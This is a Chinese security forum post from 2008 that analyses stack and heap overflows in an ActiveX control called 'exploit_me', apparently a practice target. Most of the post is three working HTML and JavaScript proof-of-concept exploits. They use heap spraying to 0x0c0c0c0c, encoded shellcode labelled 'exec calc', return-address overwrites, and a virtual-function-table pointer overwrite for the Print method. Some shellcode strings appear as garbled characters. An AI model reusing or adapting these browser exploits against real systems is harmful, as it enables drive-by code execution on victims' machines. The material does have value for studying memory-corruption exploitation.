-
-
exploit_me(B)堆溢出,栈溢出利用分析
-
发表于:
2008-1-5 17:05
10460
-
花了不少时间,终于把它们搞定,发出来庆祝一下。
Author:dge
栈溢出的利用:
LoadPage
Register
堆溢出的利用:
Print
GetRemoteFileTime
1.栈溢出的利用
栈溢出往往是在把字符串拷贝到局部变量中时,没有做长度检查,用IDA对函数做简单的分析,我们就可以看出在LoadPage,Register中都存在这种问题。
栈溢出利用比较简单,可以用heap spraying或利用跳板跳到栈中去执行已经布置好的shellcode。
下面用的是heap spraying的方法,先在0c0c0c0c区域布置上我们的shellcode,再用0c0c0c0c覆盖返回地址。利用就完成了。
(poc代码框架修改自http://www.milw0rm.com/exploits/4366)
LoadPage方法的poc:
<OBJECT id=target classid=clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2></OBJECT>
<SCRIPT>
document.write("<meta http-equiv=\"refresh\" content=\"1, " + window.location.href + "\"></meta>");
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape(
"%u9090邐邐邐邐邐邐邐" +
// exec calc
"줱��⑴寴玁" +
"荩ﳫ☉榦컵Ⱪ" +
"䗉沞쾍횺㙩쿕 " +
"奄桩;䩙ᴢ搨" +
"鴉髎淆⮀㙩쿑༉" +
"쉾튪苣퉾桩䜞䶾" +
"꧓䖑妢斚蹾" +
"튅욝怉乾楒컵ũ" +
"釉鿓颕酫㦙㺝浨" +
"ꚪ靺쁿隵괒փ캖槢"
);
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("ఌఌ");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var str1="FFFFFFFFFFFFFFFFFFFF";
str=str1+str1+str1+str1+str1+str1+str1+str1+str1+str1+str1+str1+"FFFFFFFFFFFFFFFF"+"\x0c\x0c\x0c\x0c";
target.LoadPage(str,1,1,1);
</SCRIPT>
<OBJECT id=target classid=clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2></OBJECT>
<SCRIPT>
document.write("<meta http-equiv=\"refresh\" content=\"1, " + window.location.href + "\"></meta>");
var heapSprayToAddress = 0x0c0c0c0c;
var shellcode = unescape(
"邐邐邐邐邐邐邐邐" +
// exec calc
"줱��⑴寴玁" +
"荩ﳫ☉榦컵Ⱪ" +
"䗉沞쾍횺㙩쿕 " +
"奄桩;䩙ᴢ搨" +
"鴉髎淆⮀㙩쿑༉" +
"쉾튪苣퉾桩䜞䶾" +
"꧓䖑妢斚蹾" +
"튅욝怉乾楒컵ũ" +
"釉鿓颕酫㦙㺝浨" +
"ꚪ靺쁿隵괒փ캖槢"
);
var heapBlockSize = 0x100000;
var payLoadSize = shellcode.length * 2;
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
var spraySlide = unescape("ఌఌ");
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
heapBlocks = (heapSprayToAddress)/heapBlockSize;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i] = spraySlide + shellcode;
}
function getSpraySlide(spraySlide, spraySlideSize)
{
while (spraySlide.length*2<spraySlideSize)
{
spraySlide += spraySlide;
}
spraySlide = spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
var str1="FFFFFFFFFFFFFFFFFFFF";
str=str1+str1+str1+str1+str1+str1+str1+str1+str1+str1+str1+str1+str1+"\x0c\x0c\x0c\x0c";
target.Register(str1,str);
</SCRIPT>
<object id="target" classid="clsid:7F5E27CE-4A5C-11D3-9232-0000B48A05B2"></object>
<script language="javascript">
var shellcode = unescape("hj
8hc壯Of窤fPfPf窤f駂fPT^崀魫3来+鄁窤fAfAfpPhuserT3襠媄0婯婭1Y媔6X怓FFF=j
8uUP]XW鴷`婨<婰x蛬Y S,$[3G怭嬊3也麾P$^6^X鯔3缞:膖潦蠪腽;T$u計Y$輋4{f_媃S,$[,粫_玏a=j
8u啇3跾hoho
hdgeh嬆SPPSW黃W烫烫烫蘒嬱侅");
var s = "A";
while(s.length<480)
{
s+="A"
}
s+="\x04\x06\x2d\x02";//覆盖对象中的虚函数表指针
s+="\x08\x06\x2d\x02";//在虚函数表的第一项中填上shellcode的地址,也就是他后边的地址
s+=shellcode; //把shellcode 覆盖到这里
target.Print(s,1,1,1,1);
document.write("<meta http-equiv=\"refresh\" content=\"1, " + window.location.href + "\"></meta>");//必须刷新,否则不会触发。
</SCRIPT>
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
